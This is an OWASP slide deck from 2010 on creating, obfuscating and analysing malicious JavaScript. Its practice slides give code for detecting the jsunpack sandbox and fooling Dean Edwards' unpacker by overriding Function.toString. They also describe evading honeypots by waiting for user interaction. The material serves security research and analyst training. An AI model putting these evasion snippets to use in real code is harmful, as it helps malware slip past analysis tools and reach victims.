Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

The OWASP Foundation

OWASP

http://www.owasp.org

Creating, obfuscating and analyzing malware JavaScript

Krzysztof Kotowicz

PHP Developer

http://web.eskot.pl

Medycyna Praktyczna

krzysztof@kotowicz.net

June 2010

OWASP 2

Plan

Theory - Obfuscation and analysis

in general

in JavaScript

Practice - evading automatic code analyzers

jsunpack

JavaScript unpacker

Capture-HPC

OWASP

Theory

OWASP 4

Obfuscation

Goal - make analysis harder

OWASP 5

Obfuscation

There is no perfect obfuscation [cs.princeton.edu]

Analysis as debugging

Debugging is twice as hard as writing a program in the first place. So if you're as clever as you can be when you write it, how will you ever debug it? Brian Kernighan, The Elements of Programming Style

OWASP 6

Obfuscation methods

for while + if

Iteration recursion

Complex logical tests

Dummy code branches

Quasitautologies [blog.didierstevens.com]

Enigmatic variable names

OWASP 7

Obfuscation methods in JS

JavaScript is a dynamic and functional language

Code created at runtime – eval

String.fromCharCode, unescape

Regular expressions - String.replace

Packers, e.g. [dean.edwards.name]

[developer.yahoo.com]

[malwareguru.org]

[closure-compiler.appspot.com]

Others - e.g. WhiteSpace Obfuscation [ktcorpsecurity.com]

OWASP 8

Active defense against analysis

Function.toString / arguments.callee.toString [isc.sans.org]

autoencryption [isc.sans.org]

browser detection

DOM

window, navigator

timings

cookies

mouse position, screen resolution

Malware served only once per IP [research.zscaler.com]

OWASP 9

Active defense - know thy language

function is_even(n) { var parameter_is_even = (n % 2) == 0 ? true : false; return parameter_is_even; } alert(is_even(16));

OWASP 10

Result

OWASP 11

How to analyze malware JavaScript?

Know JavaScript!

Run the code & observe effects in a controlled environment

Overload functions

eval

String.fromCharCode

Deobfuscate parts of code

Be patient and creative

OWASP 12

JavaScript analysis...

Is rather heuristics than algorithm

Is rather manual than automatic

Human is required

Tools help greatly, but they're not perfect

OWASP

Practice

OWASP 14

jsunpack

Runs JS inside SpiderMonkey [mozilla.org]

JS fetched from URL, PCAP, JS/HTML file…

SM is modified to include:

DOM emulation

browser objects emulation

onload() event

monitors eval(), setTimeout() and

others

scans the code using signatures file

OWASP 15

jsunpack - weak points

Emulates browser

Code that won't run (dead branches) will be checked with signatures only

OWASP 16

Evading detection

We need to detect being run in jsunpack

if (fake_browser) { do_no_harm(); } else { redirect_to_malicious_website(); // or obfuscate an exploit }

OWASP 17

How to detect jsunpack?

Many, many ways:

Bad implementation of window.location

window.location.host = ścieżka do pliku

It adds its own global variables

fake_browser = window.location.host.match('/');

fake_browser = (typeof my_location != "undefined"); // my_navigator, my_activex, my_element, // the_activex, app, ...

OWASP 18

How to detect jsunpack?

It overloads some functions

Objects emulation has missing spots

fake_browser = (typeof PluginArray.prototype.refresh == "undefined"); fake_browser = (document.title == 'My Title');

fake_browser = (window.open.toString().match(/print/)); fake_browser = (alert.toString().match(/{\s*}/));

OWASP 19

Jsunpack - bonus

jsunpack runs not only JavaScript

Code will be run in jsunpack, but not in browsers

<script type="text/dummy"> // good enough for jsunpack </script>

OWASP 20

DEMO 1

github.com/koto/owasp-malicious-javascript/

index.php / js.js - sandbox detection

(modify js.js to test different techniques)

jekyll2.html - Dr Jekyll attack

js.js - HTML hack

(shortest jsunpack disabler)

Note to online viewers:

Demos require checking and running the files locally - see attached docs

OWASP 21

jsunpack - summary

You could easily detect being run in jsunpack sandbox

When detected, you just skip doing bad stuff

If malware code is obfuscated, it will not be detected with signatures

You go under the radar of jsunpack analysis

OWASP 22

Dean Edwards' Unpacker

A JavaScript Decompressor [dean.edwards.name]

Reverses Dean Edward's packer

Packer works like this:

eval(function(p,a,c,k,e,r){/*code*/}(para, meters)) /* which is the same as */ var packer = function(p,a,c,k,e,r) {/**/}; var s = packer(para,meters); eval(s);

OWASP 23

Unpacker - step 1

Replace eval() with string assignment

value holds decompressed code

// packed code is in input var input="eval(function(p,a,c,k...."; eval("var value=String" + input.slice(4)); // cut "eval" // executed code will be: var value=String(function(p,a,c,k..);

OWASP 24

Unpacker - step 1

Replace eval() with string assignment

value holds decompressed code

But! we're blindly executing cut&pasted code!

// packed code is in input var input="eval(function(p,a,c,k...."; eval("var value=String" + input.slice(4)); // cut "eval" // executed code will be: var value=String(function(p,a,c,k..);

OWASP 25

Unpacker - step 2

Use Function.toString() to display the code

Unpacked code WILL NOT RUN, it wil just print!

Disclaimer - the real code is a bit different, but the concept is the same

eval( "var unpacked = function() {" + value + "}" ); alert(unpacked.toString());

OWASP 26

Dean Edwards Unpacker - weak points

Concatenating strings and executing the resulting code (injection, anyone?)

Using a constant - we cut first 4 characters without looking at them

eval() without any validation

Depends on Function.toString() to print the code

OWASP 27

Dean Edwards Unpacker - disarming

eval() uses a single parameter

String() uses a single parameter

...but you could give more :)

Arbitrary code execution without changing p,a,c,k,e,r function!

eval("code"); eval("code", "ignored"); eval("code", malicious()); String("code", malicious());

OWASP 28

Dean Edwards Unpacker - disarming

malicious() will execute in packed code

and in unpacker

eval(function(p,a,c,k,e,r){...}(para,meters),malicious()); var value=String(function(p,a,c,k,e,r){...}(para,meters),malicious());

OWASP 29

Dean Edwards Unpacker - disarming

What can we do in malicious()?

Unpacker uses Function.toString()

Let's override it!

malicious() is e.g. obfuscated:

Function.prototype.toString = function() { return 'harmless code'; }

OWASP 30

DEMO 2

github.com/koto/owasp-malicious-javascript/

demo2/evil.packed.js

OWASP 31

Dean Edwards Unpacker - point of concept

OWASP 32

High interaction client honeypots

Capture-HPC [projects.honeynet.org] as an example

Code is run in real browser in a virtual machine

Server serves URL list to visit

Client starts browsers and waits…

Code side-effects are monitored

Filesystem

Registry

Processes

If anything suspicious happens with the system, URL is reported to server as a malware

OWASP 33

High interaction client honeypots

Runtime environment is the same

There is no emulation

Could we detect we're traced?

OWASP 34

Weak point

OWASP 35

High interaction client honeypots - robot

Doesn't move mouse

Doesn't click

Doesn't drag

Doesn't navigate

Is "stupid"

OWASP 36

High interaction client honeypots - user

Moves mouse

Clicks

Drags

Navigates

Is stupid

OWASP 37

Honeypots – social engineering

OWASP 38

Honeypots – social engineering

OWASP 39

Honeypots - summary

No emulation layer to detect

Code is run in real browser

Weakest point is the lack of human element

Just run the code after detecting an interaction with the page

OWASP 40

Summary

Obfuscation can only make analysis slower

Code can actively defend against analysis

Human is required to do a complete analysis

Analysis requires strong skills

Automatic tools can be fooled

detect emulation differences

errors

lack of full interaction with a webpage

OWASP 41

Links Demo source: github.com/koto/owasp-malicious-javascript

Tools

jsunpack.blogspot.com

dean.edwards.name/unpacker/

projects.honeynet.org/capture-hpc

malzilla.sourceforge.net

Obfuscation and analysis

isc.sans.org/diary.html

www.malwareguru.org

delicious.com/koto/obfuscation

closure-compiler.appspot.com

JavaScript

www.slideshare.net/ferrantes/just-advanced-javascript

jsninja.com

krzysztof@kotowicz.net http://blog.kotowicz.net